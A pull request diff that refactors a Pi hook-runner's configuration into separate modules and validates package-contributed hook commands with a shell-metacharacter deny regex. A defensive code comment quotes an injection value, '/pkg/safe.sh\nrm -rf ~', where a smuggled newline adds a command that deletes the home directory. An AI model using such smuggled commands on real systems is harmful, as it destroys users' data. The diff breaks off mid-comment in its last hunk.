### PR TITLE
chore(pi): hook-runner polish — config split, dead-code removal, test depth

### DIFF
--- a/dist/pi/extensions/hook-runner/config-package.ts
+++ b/dist/pi/extensions/hook-runner/config-package.ts
@@ -1,0 +1,149 @@
+/**
+ * Discovery and validation of package-contributed hooks.
+ *
+ * Pi packages may declare `cc-thingz.hooks` in their `package.json` to register
+ * hooks without editing cc-thingz. Each contributed command must be an absolute
+ * path resolved inside the package's directory and free of shell metacharacters.
+ */
+
+import { existsSync, readdirSync, readFileSync, statSync } from "node:fs";
+import { join, resolve as resolvePath } from "node:path";
+
+import { agentDir, PKG_DIR_PLACEHOLDER } from "./config-paths.js";
+import { mergeHooks, normalizeHookConfig } from "./config-parse.js";
+import type { HookEntryRuntime, HookGroup, HooksConfig } from "./types.js";
+import { isRecord } from "./types.js";
+
+// Shell metacharacters that change interpretation when passed to `bash -c`.
+// Plugin-contributed commands run inside the user's shell so any of these is
+// a potential injection vector from a malicious package. Newlines and
+// carriage returns are included because `bash -c` happily executes every
+// line of a multiline argument; without them, a package.json string like
+// "/pkg/safe.sh\nrm -rf ~" would split into two commands and the second
+// would run despite the first-token path check.
+const PACKAGE_CMD_FORBIDDEN_RE = /[;&|<>`$()\\{}\n\r]/;
+
+/**
+ * Validate a package-contributed hook command.
+ *
+ * Returns the resolved command string when safe, or `undefined` when the
+ * command would escape the package's directory or contain shell metachars.
+ * Plugin authors can use `${PKG_DIR}` as a stand-in for the package root;
+ * everything else must be an absolute path that resolves inside `repoDir`.
+ */
+export function validatePackageCommand(command: string, repoDir: string): string | undefined {
+	if (typeof command !== "string") return undefined;
+	const substituted = command.replaceAll(PKG_DIR_PLACEHOLDER, repoDir);
+	const trimmed = substituted.trim();
+	if (!trimmed) return undefined;
+	if (PACKAGE_CMD_FORBIDDEN_RE.test(substituted)) return undefined;
+	const firstToken = trimmed.split(/\s+/)[0] ?? "";
+	if (!firstToken.startsWith("/")) return undefined;
+	const repoAbs = resolvePath(repoDir);
+	const cmdAbs = resolvePath(firstToken);
+	if (cmdAbs !== repoAbs && !cmdAbs.startsWith(repoAbs + "/")) return undefined;
+	return substituted;
+}
+
+function sanitisePackageContribution(config: HooksConfig, repoDir: string): HooksConfig {
+	const out: HooksConfig = {};
+	for (const [eventName, groups] of Object.entries(config)) {
+		if (!groups) continue;
+		const cleanGroups: HookGroup[] = [];
+		for (const group of groups) {
+			const cleanHooks: HookEntryRuntime[] = [];
+			for (const entry of group.hooks) {
+				const safe = validatePackageCommand(entry.config.command, repoDir);
+				if (!safe) continue;
+				cleanHooks.push({
+					...entry,
+					config: { ...entry.config, command: safe },
+				});
+			}
+			if (cleanHooks.length === 0) continue;
+			cleanGroups.push({ matcher: group.matcher, hooks: cleanHooks });
+		}
+		if (cleanGroups.length > 0) out[eventName] = cleanGroups;
+	}
+	return out;
+}
+
+/**
+ * Parse a `package.json` body looking for `cc-thingz.hooks` contributions.
+ *
+ * When `repoDir` is provided, every contributed command must either be an
+ * absolute path inside `repoDir` or use the `${PKG_DIR}` placeholder; commands
+ * with shell metacharacters are rejected. When `repoDir` is omitted the parser
+ * skips path validation — useful for round-trip parsing in tooling tests but
+ * never the path taken at runtime.
+ */
+export function parsePackageContribution(packageJsonContent: string, repoDir?: string): HooksConfig | undefined {
+	try {
+		const parsed = JSON.parse(packageJsonContent) as unknown;
+		if (!isRecord(parsed)) return undefined;
+		const ccThingz = parsed["cc-thingz"];
+		if (!isRecord(ccThingz)) return undefined;
+		const hooks = ccThingz.hooks;
+		if (!isRecord(hooks)) return undefined;
+		const normalized = normalizeHookConfig(hooks);
+		if (repoDir === undefined) return normalized;
+		const cleaned = sanitisePackageContribution(normalized, repoDir);
+		return Object.keys(cleaned).length > 0 ? cleaned : undefined;
+	} catch {
+		return undefined;
+	}
+}
+
+function safeIsDirectory(path: string): boolean {
+	try {
+		return statSync(path).isDirectory();
+	} catch {
+		return false;
+	}
+}
+
+function readPackageContribution(repoDir: string): HooksConfig | undefined {
+	const manifest = join(repoDir, "package.json");
+	if (!existsSync(manifest)) return undefined;
+	try {
+		const raw = readFileSync(manifest, "utf-8");
+		return parsePackageContribution(raw, repoDir);
+	} catch {
+		return undefined;
+	}
+}
+
+/**
+ * Scan installed Pi packages for hook contributions.
+ *
+ * Layout: Pi installs each git package under `~/.pi/agent/git/<host>/<org>/<repo>/`,
+ * so we look three levels deep from `agentDir()/git/`. Errors during scan
+ * are silently swallowed — a misshapen package.json must never break
+ * session_start.
+ */
+export function discoverPackageHookContributions(): HooksConfig {
+	const base = join(agentDir(), "git");
+	if (!existsSync(base)) return {};
+	const merged: HooksConfig = {};
+	try {
+		for (const host of readdirSync(base)) {
+			const hostDir = join(base, host);
+			if (!safeIsDirectory(hostDir)) continue;
+			for (const org of readdirSync(hostDir)) {
+				const orgDir = join(hostDir, org);
+				if (!safeIsDirectory(orgDir)) continue;
+				for (const repo of readdirSync(orgDir)) {
+					const repoDir = join(orgDir, repo);
+					if (!safeIsDirectory(repoDir)) continue;
+					const contributed = readPackageContribution(repoDir);
+					if (contributed) {
+						mergeHooks(merged, contributed);
+					}
+				}
+			}
+		}
+	} catch {
+		// Best-effort scan.
+	}
+	return merged;
+}

--- a/dist/pi/extensions/hook-runner/config-parse.ts
+++ b/dist/pi/extensions/hook-runner/config-parse.ts
@@ -1,0 +1,147 @@
+/**
+ * Pure parsing, normalisation, tagging, and merge helpers for hooks config.
+ * No fs access, no module state — safe to call from any layer.
+ */
+
+import type { HookEntryConfig, HookEntryRuntime, HookGroup, HookRunnerOptions, HooksConfig, HookSource } from "./types.js";
+import { isRecord } from "./types.js";
+import { HOOKS_DIR, PI_HOOKS_DIR_PLACEHOLDER } from "./config-paths.js";
+
+export function normalizeHookConfig(raw: unknown): HooksConfig {
+	if (!isRecord(raw)) return {};
+	const normalized: HooksConfig = {};
+	for (const [key, groups] of Object.entries(raw)) {
+		if (key === "hookRunner") continue;
+		if (!Array.isArray(groups)) continue;
+		const validGroups: HookGroup[] = [];
+		for (const group of groups) {
+			if (!isRecord(group)) continue;
+			if (!Array.isArray(group.hooks)) continue;
+			const validEntries: HookEntryRuntime[] = [];
+			for (const entry of group.hooks) {
+				if (!isRecord(entry) || typeof entry.command !== "string") continue;
+				const config: HookEntryConfig = {
+					type: "command",
+					command: entry.command,
+				};
+				if (typeof entry.timeout === "number") config.timeout = entry.timeout;
+				if (typeof entry.async === "boolean") config.async = entry.async;
+				// Source/disabled are filled in later by tagEntries / applyDisabled.
+				validEntries.push({ config, source: "bundled", disabled: false, eventName: key });
+			}
+			if (validEntries.length === 0) continue;
+			validGroups.push({
+				matcher: typeof group.matcher === "string" ? group.matcher : undefined,
+				hooks: validEntries,
+			});
+		}
+		if (validGroups.length > 0) normalized[key] = validGroups;
+	}
+	return normalized;
+}
+
+export function resolveBundledHookPaths(config: HooksConfig): HooksConfig {
+	const resolved: HooksConfig = {};
+	for (const [eventName, groups] of Object.entries(config)) {
+		if (!groups) continue;
+		resolved[eventName] = groups.map((group) => ({
+			matcher: group.matcher,
+			hooks: group.hooks.map((entry) => ({
+				...entry,
+				config: {
+					...entry.config,
+					command: entry.config.command.replaceAll(PI_HOOKS_DIR_PLACEHOLDER, HOOKS_DIR),
+				},
+			})),
+		}));
+	}
+	return resolved;
+}
+
+export function extractHookRunnerOptions(parsed: unknown): HookRunnerOptions {
+	if (!isRecord(parsed)) return {};
+	const raw = parsed.hookRunner;
+	if (!isRecord(raw)) return {};
+	const opts: HookRunnerOptions = {
+		disableBundledHooks: raw.disableBundledHooks === true,
+	};
+	if (Array.isArray(raw.disabledHooks)) {
+		opts.disabledHooks = raw.disabledHooks.filter((v): v is string => typeof v === "string");
+	}
+	return opts;
+}
+
+export function extractHooksConfig(parsed: unknown, configPath: string): HooksConfig {
+	if (!isRecord(parsed)) return {};
+	const nestedHooks = parsed.hooks;
+	if (isRecord(nestedHooks)) {
+		return normalizeHookConfig(nestedHooks);
+	}
+	if (configPath.endsWith("hooks.json")) {
+		return normalizeHookConfig(parsed);
+	}
+	return {};
+}
+
+export function tagEntries(config: HooksConfig, source: HookSource): HooksConfig {
+	const out: HooksConfig = {};
+	for (const [eventName, groups] of Object.entries(config)) {
+		if (!groups) continue;
+		out[eventName] = groups.map((group) => ({
+			matcher: group.matcher,
+			hooks: group.hooks.map((entry) => ({ ...entry, source })),
+		}));
+	}
+	return out;
+}
+
+export function basename(commandPath: string): string {
+	const trimmed = commandPath.trim().split(/\s+/)[0] ?? "";
+	return trimmed.split("/").pop() ?? trimmed;
+}
+
+export function applyDisabled(config: HooksConfig, disabled: Set<string>): void {
+	if (disabled.size === 0) return;
+	for (const groups of Object.values(config)) {
+		if (!groups) continue;
+		for (const group of groups) {
+			for (const entry of group.hooks) {
+				if (disabled.has(basename(entry.config.command))) {
+					entry.disabled = true;
+				}
+			}
+		}
+	}
+}
+
+export function filterEnabled(config: HooksConfig): HooksConfig {
+	const out: HooksConfig = {};
+	for (const [eventName, groups] of Object.entries(config)) {
+		if (!groups) continue;
+		const filteredGroups = groups
+			.map((group) => ({
+				matcher: group.matcher,
+				hooks: group.hooks.filter((entry) => !entry.disabled),
+			}))
+			.filter((group) => group.hooks.length > 0);
+		if (filteredGroups.length > 0) {
+			out[eventName] = filteredGroups;
+		}
+	}
+	return out;
+}
+
+export function hasUnsupportedIfPredicate(config: HooksConfig): boolean {
+	return Object.values(config)
+		.flat()
+		.flatMap((g) => g?.hooks ?? [])
+		.some((h) => "if" in h.config);
+}
+
+export function mergeHooks(base: HooksConfig, user: HooksConfig): void {
+	for (const [key, groups] of Object.entries(user)) {
+		if (!groups) continue;
+		const existing = base[key];
+		base[key] = existing ? [...existing, ...groups] : [...groups];
+	}
+}

--- a/dist/pi/extensions/hook-runner/config-paths.ts
+++ b/dist/pi/extensions/hook-runner/config-paths.ts
@@ -1,0 +1,28 @@
+/**
+ * Filesystem paths and placeholder constants used across hook-runner config.
+ */
+
+import { homedir } from "node:os";
+import { dirname, join } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+// dist/pi/extensions/hook-runner/config-paths.ts → ../../hooks → dist/pi/hooks
+export const HOOKS_DIR = join(__dirname, "..", "..", "hooks");
+export const BUNDLED_HOOKS_CONFIG_PATH = join(__dirname, "..", "hooks.json");
+export const PI_HOOKS_DIR_PLACEHOLDER = "${PI_HOOKS_DIR}";
+export const PKG_DIR_PLACEHOLDER = "${PKG_DIR}";
+export const FORCED_RELOAD_DEBOUNCE_MS = 500;
+
+export function agentDir(): string {
+	return process.env.PI_CODING_AGENT_DIR || join(homedir(), ".pi", "agent");
+}
+
+export function projectHooksConfigPath(cwd: string): string {
+	return join(cwd, ".pi", "hooks.json");
+}
+
+export function globalHooksConfigPath(): string {
+	return join(agentDir(), "hooks.json");
+}

--- a/dist/pi/extensions/hook-runner/config-persist.ts
+++ b/dist/pi/extensions/hook-runner/config-persist.ts
@@ -1,0 +1,34 @@
+/**
+ * Filesystem read/write helpers for hooks config files.
+ */
+
+import { existsSync, mkdirSync, readFileSync, writeFileSync } from "node:fs";
+import { dirname } from "node:path";
+
+import { projectHooksConfigPath } from "./config-paths.js";
+import { extractHookRunnerOptions } from "./config-parse.js";
+import type { HookRunnerOptions } from "./types.js";
+
+export function writeHooksConfig(path: string, parsed: Record<string, unknown>): void {
+	mkdirSync(dirname(path), { recursive: true });
+	writeFileSync(path, JSON.stringify(parsed, null, 2) + "\n", "utf-8");
+}
+
+export function readHookRunnerOptions(path: string): HookRunnerOptions {
+	try {
+		const raw = readFileSync(path, "utf-8");
+		const parsed = JSON.parse(raw) as unknown;
+		return extractHookRunnerOptions(parsed);
+	} catch {
+		return {};
+	}
+}
+
+export function readProjectHookRunnerOptions(cwd: string): HookRunnerOptions {
+	return readHookRunnerOptions(projectHooksConfigPath(cwd));
+}
+
+/** existsSync wrapper for callers that want to check before reading. */
+export function pathExists(path: string): boolean {
+	return existsSync(path);
+}

--- a/dist/pi/extensions/hook-runner/config-summary.ts
+++ b/dist/pi/extensions/hook-runner/config-summary.ts
@@ -1,0 +1,52 @@
+/**
+ * Render helpers for the `/hooks` slash command.
+ */
+
+import { basename } from "./config-parse.js";
+import type { HooksConfig, HookSource } from "./types.js";
+
+export function hooksSummary(config: HooksConfig): string {
+	const lines: string[] = [];
+	const events = Object.keys(config).sort();
+	for (const eventName of events) {
+		const groups = config[eventName];
+		if (!groups || groups.length === 0) continue;
+		lines.push(`${eventName}:`);
+		for (const group of groups) {
+			const matcher = group.matcher ? `[${group.matcher}]` : "[*]";
+			for (const entry of group.hooks) {
+				const status = entry.disabled ? " (disabled)" : "";
+				const flags = entry.config.async ? " async" : "";
+				lines.push(`  ${matcher} ${basename(entry.config.command)} (${entry.source})${flags}${status}`);
+			}
+		}
+	}
+	if (lines.length === 0) return "No hooks configured.";
+	return lines.join("\n");
+}
+
+export interface HookNameEntry {
+	name: string;
+	disabled: boolean;
+	source: HookSource;
+}
+
+export function listAllHookNames(config: HooksConfig): HookNameEntry[] {
+	const seen = new Map<string, HookNameEntry>();
+	for (const groups of Object.values(config)) {
+		if (!groups) continue;
+		for (const group of groups) {
+			for (const entry of group.hooks) {
+				const name = basename(entry.config.command);
+				if (!name) continue;
+				const existing = seen.get(name);
+				if (!existing) {
+					seen.set(name, { name, disabled: entry.disabled, source: entry.source });
+				} else if (entry.disabled) {
+					existing.disabled = true;
+				}
+			}
+		}
+	}
+	return [...seen.values()].sort((a, b) => a.name.localeCompare(b.name));
+}

--- a/dist/pi/extensions/hook-runner/config.ts
+++ b/dist/pi/extensions/hook-runner/config.ts
@@ -1,42 +1,54 @@
 /**
- * Hook-runner configuration: discovery, merge, persistence, summary.
+ * Hook-runner configuration: in-memory cache + the `loadConfig` orchestrator.
  *
- * Module-level cache. Loaded lazily on first session_start (or forced reload
- * on ConfigChange), keyed by cwd. The cache is process-local — Pi reuses
- * the same Node runtime across sessions.
+ * Pure helpers live in sibling files:
+ *  - `config-paths.ts`    — path resolution constants
+ *  - `config-parse.ts`    — normalisation, tagging, merge
+ *  - `config-package.ts`  — package-contributed hooks + validation
+ *  - `config-persist.ts`  — fs read/write helpers
+ *  - `config-summary.ts`  — `/hooks` render helpers
+ *
+ * This file re-exports the public surface and owns the lazy-loaded cache,
+ * keyed by cwd. The cache is process-local — Pi reuses the same Node runtime
+ * across sessions.
  */
 
-import { existsSync, mkdirSync, readdirSync, readFileSync, writeFileSync, statSync } from "node:fs";
-import { homedir } from "node:os";
-import { dirname, join, resolve as resolvePath } from "node:path";
-import { fileURLToPath } from "node:url";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
 
-import type { HookEntryConfig, HookEntryRuntime, HookGroup, HooksConfig, HookRunnerOptions, HookSource } from "./types.js";
-import { isRecord } from "./types.js";
+import { agentDir, BUNDLED_HOOKS_CONFIG_PATH, FORCED_RELOAD_DEBOUNCE_MS } from "./config-paths.js";
+import {
+	applyDisabled,
+	extractHookRunnerOptions,
+	extractHooksConfig,
+	filterEnabled,
+	hasUnsupportedIfPredicate,
+	mergeHooks,
+	resolveBundledHookPaths,
+	tagEntries,
+} from "./config-parse.js";
+import { discoverPackageHookContributions } from "./config-package.js";
+import type { HooksConfig, HookSource } from "./types.js";
 
 // ---------------------------------------------------------------------------
-// Path resolution — works regardless of where Pi cloned the package
+// Public re-exports (preserve external import path `./config.js`)
 // ---------------------------------------------------------------------------
 
-const __filename = fileURLToPath(import.meta.url);
-const __dirname = dirname(__filename);
-// dist/pi/extensions/hook-runner/config.ts → ../../hooks → dist/pi/hooks
-export const HOOKS_DIR = join(__dirname, "..", "..", "hooks");
-export const BUNDLED_HOOKS_CONFIG_PATH = join(__dirname, "..", "hooks.json");
-export const PI_HOOKS_DIR_PLACEHOLDER = "${PI_HOOKS_DIR}";
-export const FORCED_RELOAD_DEBOUNCE_MS = 500;
-
-export function agentDir(): string {
-	return process.env.PI_CODING_AGENT_DIR || join(homedir(), ".pi", "agent");
-}
-
-export function projectHooksConfigPath(cwd: string): string {
-	return join(cwd, ".pi", "hooks.json");
-}
-
-export function globalHooksConfigPath(): string {
-	return join(agentDir(), "hooks.json");
-}
+export {
+	agentDir,
+	BUNDLED_HOOKS_CONFIG_PATH,
+	FORCED_RELOAD_DEBOUNCE_MS,
+	globalHooksConfigPath,
+	HOOKS_DIR,
+	PI_HOOKS_DIR_PLACEHOLDER,
+	PKG_DIR_PLACEHOLDER,
+	projectHooksConfigPath,
+} from "./config-paths.js";
+export { basename } from "./config-parse.js";
+export { discoverPackageHookContributions, parsePackageContribution, validatePackageCommand } from "./config-package.js";
+export { pathExists, readHookRunnerOptions, readProjectHookRunnerOptions, writeHooksConfig } from "./config-persist.js";
+export { hooksSummary, listAllHookNames } from "./config-summary.js";
+export type { HookNameEntry } from "./config-summary.js";
 
 // ---------------------------------------------------------------------------
 // Module state
@@ -59,148 +71,6 @@ export function _resetForTesting(): void {
 	_bundledCache = null;
 }
 
-// ---------------------------------------------------------------------------
-// Parsing & normalisation
-// ---------------------------------------------------------------------------
-
-function normalizeHookConfig(raw: unknown): HooksConfig {
-	if (!isRecord(raw)) return {};
-	const normalized: HooksConfig = {};
-	for (const [key, groups] of Object.entries(raw)) {
-		if (key === "hookRunner") continue;
-		if (!Array.isArray(groups)) continue;
-		const validGroups: HookGroup[] = [];
-		for (const group of groups) {
-			if (!isRecord(group)) continue;
-			if (!Array.isArray(group.hooks)) continue;
-			const validEntries: HookEntryRuntime[] = [];
-			for (const entry of group.hooks) {
-				if (!isRecord(entry) || typeof entry.command !== "string") continue;
-				const config: HookEntryConfig = {
-					type: "command",
-					command: entry.command,
-				};
-				if (typeof entry.timeout === "number") config.timeout = entry.timeout;
-				if (typeof entry.async === "boolean") config.async = entry.async;
-				// Source/disabled are filled in later by tagEntries / applyDisabled.
-				validEntries.push({ config, source: "bundled", disabled: false, eventName: key });
-			}
-			if (validEntries.length === 0) continue;
-			validGroups.push({
-				matcher: typeof group.matcher === "string" ? group.matcher : undefined,
-				hooks: validEntries,
-			});
-		}
-		if (validGroups.length > 0) normalized[key] = validGroups;
-	}
-	return normalized;
-}
-
-function resolveBundledHookPaths(config: HooksConfig): HooksConfig {
-	const resolved: HooksConfig = {};
-	for (const [eventName, groups] of Object.entries(config)) {
-		if (!groups) continue;
-		resolved[eventName] = groups.map((group) => ({
-			matcher: group.matcher,
-			hooks: group.hooks.map((entry) => ({
-				...entry,
-				config: {
-					...entry.config,
-					command: entry.config.command.replaceAll(PI_HOOKS_DIR_PLACEHOLDER, HOOKS_DIR),
-				},
-			})),
-		}));
-	}
-	return resolved;
-}
-
-function extractHookRunnerOptions(parsed: unknown): HookRunnerOptions {
-	if (!isRecord(parsed)) return {};
-	const raw = parsed.hookRunner;
-	if (!isRecord(raw)) return {};
-	const opts: HookRunnerOptions = {
-		disableBundledHooks: raw.disableBundledHooks === true,
-	};
-	if (Array.isArray(raw.disabledHooks)) {
-		opts.disabledHooks = raw.disabledHooks.filter((v): v is string => typeof v === "string");
-	}
-	return opts;
-}
-
-export function readHookRunnerOptions(path: string): HookRunnerOptions {
-	try {
-		const raw = readFileSync(path, "utf-8");
-		const parsed = JSON.parse(raw) as unknown;
-		return extractHookRunnerOptions(parsed);
-	} catch {
-		return {};
-	}
-}
-
-export function readProjectHookRunnerOptions(cwd: string): HookRunnerOptions {
-	return readHookRunnerOptions(projectHooksConfigPath(cwd));
-}
-
-function tagEntries(config: HooksConfig, source: HookSource): HooksConfig {
-	const out: HooksConfig = {};
-	for (const [eventName, groups] of Object.entries(config)) {
-		if (!groups) continue;
-		out[eventName] = groups.map((group) => ({
-			matcher: group.matcher,
-			hooks: group.hooks.map((entry) => ({ ...entry, source })),
-		}));
-	}
-	return out;
-}
-
-export function basename(commandPath: string): string {
-	const trimmed = commandPath.trim().split(/\s+/)[0] ?? "";
-	return trimmed.split("/").pop() ?? trimmed;
-}
-
-function applyDisabled(config: HooksConfig, disabled: Set<string>): void {
-	if (disabled.size === 0) return;
-	for (const groups of Object.values(config)) {
-		if (!groups) continue;
-		for (const group of groups) {
-			for (const entry of group.hooks) {
-				if (disabled.has(basename(entry.config.command))) {
-					entry.disabled = true;
-				}
-			}
-		}
-	}
-}
-
-function filterEnabled(config: HooksConfig): HooksConfig {
-	const out: HooksConfig = {};
-	for (const [eventName, groups] of Object.entries(config)) {
-		if (!groups) continue;
-		const filteredGroups = groups
-			.map((group) => ({
-				matcher: group.matcher,
-				hooks: group.hooks.filter((entry) => !entry.disabled),
-			}))
-			.filter((group) => group.hooks.length > 0);
-		if (filteredGroups.length > 0) {
-			out[eventName] = filteredGroups;
-		}
-	}
-	return out;
-}
-
-function extractHooksConfig(parsed: unknown, configPath: string): HooksConfig {
-	if (!isRecord(parsed)) return {};
-	const nestedHooks = parsed.hooks;
-	if (isRecord(nestedHooks)) {
-		return normalizeHookConfig(nestedHooks);
-	}
-	if (configPath.endsWith("hooks.json")) {
-		return normalizeHookConfig(parsed);
-	}
-	return {};
-}
-
 function loadBundledHooksConfig(): HooksConfig {
 	if (_bundledCache) return _bundledCache;
 	try {
@@ -214,162 +84,8 @@ function loadBundledHooksConfig(): HooksConfig {
 	return _bundledCache;
 }
 
-function hasUnsupportedIfPredicate(config: HooksConfig): boolean {
-	return Object.values(config)
-		.flat()
-		.flatMap((g) => g?.hooks ?? [])
-		.some((h) => "if" in h.config);
-}
-
-function mergeHooks(base: HooksConfig, user: HooksConfig): void {
-	for (const [key, groups] of Object.entries(user)) {
-		if (!groups) continue;
-		const existing = base[key];
-		base[key] = existing ? [...existing, ...groups] : [...groups];
-	}
-}
-
-/**
- * Scan installed Pi packages for hook contributions.
- *
- * A Pi package may declare `cc-thingz.hooks: { <eventName>: HookGroup[] }`
- * inside its `package.json`; cc-thingz merges those entries with `source:
- * "package"` so a plugin can register hooks without editing cc-thingz.
- *
- * Layout: Pi installs each git package under `~/.pi/agent/git/<host>/<org>/<repo>/`,
- * so we look three levels deep from `agentDir()/git/`. Errors during scan
- * are silently swallowed — a misshapen package.json must never break
- * session_start.
- */
-export function discoverPackageHookContributions(): HooksConfig {
-	const base = join(agentDir(), "git");
-	if (!existsSync(base)) return {};
-	const merged: HooksConfig = {};
-	try {
-		for (const host of readdirSync(base)) {
-			const hostDir = join(base, host);
-			if (!safeIsDirectory(hostDir)) continue;
-			for (const org of readdirSync(hostDir)) {
-				const orgDir = join(hostDir, org);
-				if (!safeIsDirectory(orgDir)) continue;
-				for (const repo of readdirSync(orgDir)) {
-					const repoDir = join(orgDir, repo);
-					if (!safeIsDirectory(repoDir)) continue;
-					const contributed = readPackageContribution(repoDir);
-					if (contributed) {
-						mergeHooks(merged, contributed);
-					}
-				}
-			}
-		}
-	} catch {
-		// Best-effort scan.
-	}
-	return merged;
-}
-
-function safeIsDirectory(path: string): boolean {
-	try {
-		return statSync(path).isDirectory();
-	} catch {
-		return false;
-	}
-}
-
-function readPackageContribution(repoDir: string): HooksConfig | undefined {
-	const manifest = join(repoDir, "package.json");
-	if (!existsSync(manifest)) return undefined;
-	try {
-		const raw = readFileSync(manifest, "utf-8");
-		return parsePackageContribution(raw, repoDir);
-	} catch {
-		return undefined;
-	}
-}
-
-export const PKG_DIR_PLACEHOLDER = "${PKG_DIR}";
-// Shell metacharacters that change interpretation when passed to `bash -c`.
-// Plugin-contributed commands run inside the user's shell so any of these is
-// a potential injection vector from a malicious package. Newlines and
-// carriage returns are included because `bash -c` happily executes every
-// line of a multiline argument; without them, a package.json string like
-// "/pkg/safe.sh\nrm -rf ~" would split into two commands and the second
-// would run despite the first-token path check.
-const PACKAGE_CMD_FORBIDDEN_RE = /[;&|<>`$()\\{}\n\r]/;
-
-/**
- * Validate a package-contributed hook command.
- *
- * Returns the resolved command string when safe, or `undefined` when the
- * command would escape the package's directory or contain shell metachars.
- * Plugin authors can use `${PKG_DIR}` as a stand-in for the package root;
- * everything else must be an absolute path that resolves inside `repoDir`.
- */
-export function validatePackageCommand(command: string, repoDir: string): string | undefined {
-	if (typeof command !== "string") return undefined;
-	const substituted = command.replaceAll(PKG_DIR_PLACEHOLDER, repoDir);
-	const trimmed = substituted.trim();
-	if (!trimmed) return undefined;
-	if (PACKAGE_CMD_FORBIDDEN_RE.test(substituted)) return undefined;
-	const firstToken = trimmed.split(/\s+/)[0] ?? "";
-	if (!firstToken.startsWith("/")) return undefined;
-	const repoAbs = resolvePath(repoDir);
-	const cmdAbs = resolvePath(firstToken);
-	if (cmdAbs !== repoAbs && !cmdAbs.startsWith(repoAbs + "/")) return undefined;
-	return substituted;
-}
-
-function sanitisePackageContribution(config: HooksConfig, repoDir: string): HooksConfig {
-	const out: HooksConfig = {};
-	for (const [eventName, groups] of Object.entries(config)) {
-		if (!groups) continue;
-		const cleanGroups: HookGroup[] = [];
-		for (const group of groups) {
-			const cleanHooks: HookEntryRuntime[] = [];
-			for (const entry of group.hooks) {
-				const safe = validatePackageCommand(entry.config.command, repoDir);
-				if (!safe) continue;
-				cleanHooks.push({
-					...entry,
-					config: { ...entry.config, command: safe },
-				});
-			}
-			if (cleanHooks.length === 0) continue;
-			cleanGroups.push({ matcher: group.matcher, hooks: cleanHooks });
-		}
-		if (cleanGroups.length > 0) out[eventName] = cleanGroups;
-	}
-	return out;
-}
-
-/**
- * Parse a `package.json` body looking for `cc-thingz.hooks` contributions.
- *
- * When `repoDir` is provided, every contributed command must either be an
- * absolute path inside `repoDir` or use the `${PKG_DIR}` placeholder; commands
- * with shell metacharacters are rejected. When `repoDir` is omitted the parser
- * skips path validation — useful for round-trip parsing in tooling tests but
- * never the path taken at runtime.
- */
-export function parsePackageContribution(packageJsonContent: string, repoDir?: string): HooksConfig | undefined {
-	try {
-		const parsed = JSON.parse(packageJsonContent) as unknown;
-		if (!isRecord(parsed)) return undefined;
-		const ccThingz = parsed["cc-thingz"];
-		if (!isRecord(ccThingz)) return undefined;
-		const hooks = ccThingz.hooks;
-		if (!isRecord(hooks)) return undefined;
-		const normalized = normalizeHookConfig(hooks);
-		if (repoDir === undefined) return normalized;
-		const cleaned = sanitisePackageContribution(normalized, repoDir);
-		return Object.keys(cleaned).length > 0 ? cleaned : undefined;
-	} catch {
-		return undefined;
-	}
-}
-
 // ---------------------------------------------------------------------------
-// Public API
+// Public API — load + accessors
 // ---------------------------------------------------------------------------
 
 export function loadConfig(cwd: string, force = false): void {
@@ -451,64 +167,4 @@ export function resolvedConfig(): HooksConfig {
 
 export function rawConfig(): HooksConfig {
 	return _configRaw ?? loadBundledHooksConfig();
-}
-
-// ---------------------------------------------------------------------------
-// Persistence + summary
-// ---------------------------------------------------------------------------
-
-export function writeHooksConfig(path: string, parsed: Record<string, unknown>): void {
-	mkdirSync(dirname(path), { recursive: true });
-	writeFileSync(path, JSON.stringify(parsed, null, 2) + "\n", "utf-8");
-}
-
-export function hooksSummary(config: HooksConfig): string {
-	const lines: string[] = [];
-	const events = Object.keys(config).sort();
-	for (const eventName of events) {
-		const groups = config[eventName];
-		if (!groups || groups.length === 0) continue;
-		lines.push(`${eventName}:`);
-		for (const group of groups) {
-			const matcher = group.matcher ? `[${group.matcher}]` : "[*]";
-			for (const entry of group.hooks) {
-				const status = entry.disabled ? " (disabled)" : "";
-				const flags = entry.config.async ? " async" : "";
-				lines.push(`  ${matcher} ${basename(entry.config.command)} (${entry.source})${flags}${status}`);
-			}
-		}
-	}
-	if (lines.length === 0) return "No hooks configured.";
-	return lines.join("\n");
-}
-
-export interface HookNameEntry {
-	name: string;
-	disabled: boolean;
-	source: HookSource;
-}
-
-export function listAllHookNames(config: HooksConfig): HookNameEntry[] {
-	const seen = new Map<string, HookNameEntry>();
-	for (const groups of Object.values(config)) {
-		if (!groups) continue;
-		for (const group of groups) {
-			for (const entry of group.hooks) {
-				const name = basename(entry.config.command);
-				if (!name) continue;
-				const existing = seen.get(name);
-				if (!existing) {
-					seen.set(name, { name, disabled: entry.disabled, source: entry.source });
-				} else if (entry.disabled) {
-					existing.disabled = true;
-				}
-			}
-		}
-	}
-	return [...seen.values()].sort((a, b) => a.name.localeCompare(b.name));
-}
-
-/** existsSync wrapper for callers that want to check before reading. */
-export function pathExists(path: string): boolean {
-	return existsSync(path);
 }

--- a/dist/pi/extensions/hook-runner/dispatch.ts
+++ b/dist/pi/extensions/hook-runner/dispatch.ts
@@ -38,9 +38,9 @@ const PROGRESS_LINE_RE = /^\^\^PROGRESS\s+(\d{1,3})\s+(.*)$/;
 
 /**
  * Strip `^^PROGRESS N msg` markers from stderr so they never reach the LLM
- * feedback loop. The progress payload itself is dropped — no Pi consumer
- * subscribes yet, and a noisy hook stderr is more harmful than a missing
- * status update. Re-introduce a callback parameter when a consumer wires up.
+ * feedback loop. The percent/message payload is discarded: nothing inside Pi
+ * subscribes to it, and noisy hook stderr is worse than a missing status
+ * update.
  */
 export function extractProgress(stderr: string): { stderr: string } {
 	if (!stderr.includes("^^PROGRESS")) return { stderr };

--- a/dist/pi/extensions/hook-runner/dispatch.ts
+++ b/dist/pi/extensions/hook-runner/dispatch.ts
@@ -36,27 +36,19 @@ import type { HookEntryRuntime, HookEventName, HookGroup, HookRunResult } from "
 
 const PROGRESS_LINE_RE = /^\^\^PROGRESS\s+(\d{1,3})\s+(.*)$/;
 
-export interface ProgressUpdate {
-	percent: number;
-	message: string;
-}
-
-/** Strip `^^PROGRESS` markers from stderr; return the last update seen. */
-export function extractProgress(stderr: string): { stderr: string; last?: ProgressUpdate } {
+/**
+ * Strip `^^PROGRESS N msg` markers from stderr so they never reach the LLM
+ * feedback loop. The progress payload itself is dropped — no Pi consumer
+ * subscribes yet, and a noisy hook stderr is more harmful than a missing
